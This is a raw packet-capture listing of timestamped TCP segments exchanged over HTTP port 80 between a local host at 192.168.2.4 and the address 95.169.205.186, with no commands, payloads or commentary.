                                                              Jul 6, 2024 04:21:59.205286026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.205451965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.205492020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.268657923 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268668890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268678904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268688917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268701077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268713951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268722057 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.268759012 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.268789053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268800974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.268826008 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.268850088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.278588057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278651953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278655052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.278664112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278687954 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.278704882 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.278788090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278799057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278810024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278821945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278831005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.278837919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.278873920 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280272007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280318022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280347109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280359030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280392885 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280466080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280477047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280493021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280514002 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280527115 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280709982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280720949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280730963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280746937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280756950 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280759096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280767918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280780077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.280790091 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.280808926 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281014919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281025887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281060934 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281476974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281527042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281531096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281542063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281564951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281577110 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281685114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281694889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281703949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281728983 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281755924 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281807899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281819105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281827927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281840086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.281855106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.281874895 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282038927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282057047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282068014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282078981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282083988 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282094955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282107115 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282130957 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282448053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282458067 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282468081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282476902 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282488108 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282495975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282499075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282505035 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282512903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282524109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282533884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282557964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282835960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282845974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282856941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282866955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282877922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282882929 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282890081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282898903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282902956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.282916069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.282939911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283206940 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283216953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283226967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283236980 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283247948 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283253908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283258915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283272028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283272982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283284903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283310890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283611059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283622026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283631086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283642054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283658028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283660889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283673048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283683062 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283708096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283862114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283874035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.283900976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.283926010 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.291033983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291045904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291057110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291084051 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.291110039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.291172981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291183949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291193008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291204929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291214943 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.291244984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.291915894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291960955 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.291982889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.291992903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.292025089 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.292115927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.292126894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.292135954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.292146921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.292161942 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.292176008 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293075085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293118954 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293119907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293131113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293164015 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293260098 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293271065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293281078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293291092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293303967 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293319941 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293426037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293471098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293484926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293526888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293550968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293560982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293570042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293591976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293612003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293755054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293766022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293776035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.293801069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.293822050 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.294105053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294150114 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.294153929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294166088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294189930 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.294202089 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.294281960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294291973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294301987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294312000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294326067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.294354916 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.294451952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.294492006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.295296907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295309067 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295320034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295341969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.295366049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.295442104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295454025 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295461893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295471907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295481920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.295488119 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.295516968 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.358849049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.358865023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.358875990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.358922005 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.358957052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.359056950 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.359072924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.359082937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.359095097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.359106064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.359112024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.359142065 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.368652105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368704081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.368846893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368856907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368861914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368870974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368882895 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368894100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.368900061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.368928909 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.369055986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.369098902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370335102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370381117 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370389938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370399952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370429993 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370546103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370557070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370567083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370577097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370592117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370593071 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370608091 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370625019 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370784044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370794058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370804071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370819092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.370831013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.370857954 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.371004105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371015072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371025085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371048927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.371062040 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.371702909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371746063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.371773958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371784925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371817112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.371861935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371907949 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.371951103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371961117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371970892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371980906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.371998072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372025013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372155905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372165918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372203112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372308969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372319937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372324944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372334957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372347116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372356892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372360945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372370005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372370958 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372383118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372400999 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372423887 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372709990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372720003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372730970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372740984 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372750998 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.372755051 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372767925 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372795105 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.372993946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373004913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373014927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373023987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373034954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373039961 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373049974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373060942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373065948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373074055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373085022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373095989 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373126030 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373445988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373456001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373466015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373481035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373492002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373495102 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373502970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373514891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373523951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373524904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373533010 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373562098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.373960972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373971939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373980999 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.373991966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.374006033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.374008894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.374017954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.374020100 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.374046087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.374067068 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.381041050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381089926 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.381093979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381104946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381128073 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.381139040 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.381259918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381270885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381279945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381294966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.381309986 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.381340981 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.381979942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382023096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382023096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.382034063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382061005 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.382123947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382134914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382174969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.382252932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382262945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382272959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.382296085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.382309914 CEST4973080192.168.2.495.169.205.186
